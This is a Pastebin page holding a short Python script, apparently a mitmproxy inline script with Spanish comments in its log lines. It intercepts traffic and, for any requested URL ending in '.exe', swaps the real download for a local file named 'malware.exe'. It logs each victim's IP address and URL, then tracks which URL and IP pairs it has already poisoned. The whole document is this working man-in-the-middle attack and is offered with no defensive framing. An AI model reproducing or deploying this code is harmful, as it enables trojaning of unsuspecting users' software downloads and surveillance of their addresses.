Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. # -*- coding: utf-8 -*-
  2. #
  3.  
  4. import tempfile
  5. import sys, os
  6. import re
  7. import time
  8.  
  9. trojan = 'malware.exe'
  10.  
  11. yettrojaned = []
  12.  
  13. f = open('logpwned', 'a', 0)
  14.  
  15.  
  16. def response(context, flow):
  17.    
  18.     urlrequest = flow.request.get_url()
  19.     ip= flow.request.client_conn.address[0]
  20.    
  21.     pattern = urlrequest+":"+ip
  22.    
  23.     if pattern in yettrojaned :
  24.        
  25.         f.write("%s Tenemos un cliente\n " % time.asctime(time.localtime()))
  26.        
  27.         f.write("la URL solicitada %s ya ha sido envenenada\n" % urlrequest)
  28.    
  29.     if flow.request.get_url().endswith('.exe') and pattern not in yettrojaned :
  30.        
  31.        
  32.         f.write("%s Tenemos un cliente\n" % time.asctime(time.localtime()))
  33.        
  34.         ip= flow.request.client_conn.address[0]
  35.        
  36.         f.write("IP de la victima %s\n" % ip)
  37.        
  38.         f.write("URL solicitada %s\n" % urlrequest)
  39.    
  40.         yettrojaned.append(urlrequest+":"+ip)
  41.        
  42.         flow.response.content = open('%s' % trojan, 'rb').read()